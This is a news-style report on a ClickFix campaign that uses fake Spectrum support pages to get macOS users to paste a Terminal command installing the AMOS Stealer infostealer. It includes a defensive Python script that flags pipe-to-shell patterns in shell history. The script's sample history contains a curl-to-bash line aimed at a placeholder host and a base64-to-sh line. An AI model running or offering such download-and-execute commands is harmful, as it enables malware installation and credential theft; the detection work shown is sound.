A new ClickFix malware campaign has emerged targeting macOS users through fake Spectrum support websites. Cybersecurity researchers from CloudSEK have uncovered a sophisticated scheme in which attackers mimic Spectrum, a major U.S. telecom provider, by creating fraudulent domains that resemble its real support portals. The fake sites present CAPTCHA prompts that display an error message and direct victims to click an ‘Alternative Verification’ button. Clicking it copies a malicious command to the clipboard, which macOS users are then instructed to paste and execute in Terminal. The command installs AMOS Stealer, a known infostealer that extracts sensitive data such as passwords, cryptocurrency wallet keys, browser autofill data, and saved cookies.
The campaign is believed to have been orchestrated by Russian-speaking hackers, evidenced by Russian comments within the malware code and flawed delivery infrastructure. The ClickFix technique, which has been active since March 2024, relies on social engineering, exploiting users’ trust in familiar interfaces to execute malicious code. This evolving threat highlights the need for heightened vigilance, with experts urging users to be skeptical of CAPTCHA prompts, use strong antivirus software, and enable two-factor authentication to protect against such attacks.
Researchers have identified that the campaign uses a method known as ClickFix, which has been employed by cybercriminals since at least March 2024. The technique involves luring users through fake online verification prompts, which appear legitimate but are designed to trick victims into running malicious commands. In previous iterations of this attack, similar methods have been used to target Windows users, with fake error messages from Google Chrome, Microsoft Word, and OneDrive used to push malicious payloads. However, this latest campaign targets macOS, leveraging the user’s familiarity with macOS-specific interfaces to execute the attack.
Security experts emphasize that AMOS Stealer is particularly dangerous because of its ability to bypass security protections and access sensitive data. Once installed, the malware can harvest credentials, disable security measures, and exfiltrate data to remote servers. Because the infection is carried out with legitimate macOS commands, it is harder to detect: the activity blends in with normal system operations.
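As an added, defender-side example that is not part of the report, the script below screens a user's shell history for the shape such pasted one-liners commonly take: a network download or a decoded blob piped straight into an interpreter. The detection patterns, the placeholder host and the sample history lines are constructed assumptions, not indicators from the CloudSEK research.

```python
import re

# Shapes that "paste this into Terminal" lures commonly take: a network download
# or a decoded blob piped straight into an interpreter. These patterns are an
# assumption about the technique in general, not indicators from the report.
DOWNLOAD_TOOLS = r"(?:curl|wget)\b"
INTERPRETERS = r"(?:sudo\s+)?(?:sh|bash|zsh|osascript|python3?)\b"
RULES = {
    "remote-pipe-to-shell": re.compile(
        rf"{DOWNLOAD_TOOLS}[^|;&]*\|\s*{INTERPRETERS}"),
    "decoded-blob-to-shell": re.compile(
        rf"base64\s+(?:-d|--decode|-D)\b[^|;&]*\|\s*{INTERPRETERS}"),
    "eval-of-downloaded-text": re.compile(
        rf"eval\s+[\"']?\$\(\s*{DOWNLOAD_TOOLS}"),
}

# Constructed zsh extended-history sample (": <epoch>:<elapsed>;<command>").
# The host and the encoded blob (it decodes to "echo hello") are placeholders.
SAMPLE_HISTORY = [
    ": 1717000000:0;ls -la ~/Downloads",
    ": 1717000010:0;git pull origin main",
    ": 1717000020:0;curl -fsSL https://support-example.invalid/verify.sh | bash",
    ": 1717000030:0;echo 'ZWNobyBoZWxsbw==' | base64 -d | sh",
    ": 1717000040:0;brew install jq",
    ": 1717000050:0;osascript -e 'display dialog \"hello\"'",
]

def strip_history_prefix(line):
    """Remove the zsh extended-history timestamp prefix, if present."""
    if line.startswith(": ") and ";" in line:
        return line.split(";", 1)[1]
    return line

def flag_suspicious(history_lines):
    """Return (command, [matching rule names]) for each entry that fits a rule."""
    hits = []
    for line in history_lines:
        cmd = strip_history_prefix(line).strip()
        matched = [name for name, rx in RULES.items() if rx.search(cmd)]
        if matched:
            hits.append((cmd, matched))
    return hits

if __name__ == "__main__":
    for cmd, rules in flag_suspicious(SAMPLE_HISTORY):
        print(f"[{', '.join(rules)}] {cmd}")
```

Run against a real history file (for example `~/.zsh_history`) the two benign-looking lines in the sample show why the plain `osascript` invocation is left alone while the download-and-run chain is flagged.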
Users are advised to be cautious of any CAPTCHA prompts that ask them to paste commands into Terminal, as this is a clear indicator of a scam. Cybersecurity professionals recommend implementing a range of protective measures, including using robust antivirus software, enabling two-factor authentication, and keeping all systems updated to patch known vulnerabilities. These steps are crucial in preventing the spread of malware like AMOS, which poses a significant risk to both individual users and organizations.
Additionally, it is important for users to verify the legitimacy of any online links or emails they receive, especially those that mimic services they are familiar with. If an email or website seems suspicious, users should avoid clicking on any links and instead access the service’s official website directly. Regular monitoring of online accounts for unusual activity is also recommended, as early detection can prevent further damage from malware infections.